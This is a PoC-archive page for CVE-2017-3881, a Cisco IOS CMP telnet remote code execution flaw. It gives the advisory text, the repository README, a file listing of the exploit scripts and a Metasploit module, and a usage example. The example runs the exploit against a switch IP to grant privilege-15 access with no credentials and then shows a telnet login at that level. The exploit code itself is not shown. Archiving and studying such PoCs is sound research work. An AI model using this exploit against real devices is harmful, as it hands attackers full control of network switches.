Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-3881 PoC — 多款Cisco产品IOS和IOS XE Software 输入验证错误漏洞

Source
https://github.com/mzakyz666/PoC-CVE-2017-3881
Associated Vulnerability
Title:多款Cisco产品IOS和IOS XE Software 输入验证错误漏洞 (CVE-2017-3881)
Description:A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
Description
Cisco Catalyst Remote Code Execution PoC
Readme
# PoC-CVE-2017-3881
Cisco Catalyst Remote Code Execution PoC

This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability disclosed by Cisco Systems on March 17th 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp> 


Description
-------------
Exploit write-up: https://errorcybernews.com/2017/05/11/cisco-systems-merilis-update-switch/

RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. Two firmware versions are supported:

- 12.2(55)SE1  C2960-LANBASEK9-M
 
- 12.2(55)SE11 C2960-LANBASEK9-M

Denial of service code is available as a metasploit ruby module. This should work for most of the switches mentioned in the Cisco advisory (confirmation needed).

Usage example
-------------

```
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15
```


Thanks to Author:
------

Artem Kondratenko https://twitter.com/artkond
File Snapshot

 [4.0K]  /data/pocs/7adafdd1757abca5e31acaeea4a87d51427c7310
├── [2.7K]  c2960-lanbasek9-m-12.2.55.se11.py
├── [2.7K]  c2960-lanbasek9-m-12.2.55.se1.py
├── [1.5K]  CVE-2017-3881-metasploit-module.rb
└── [1.3K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →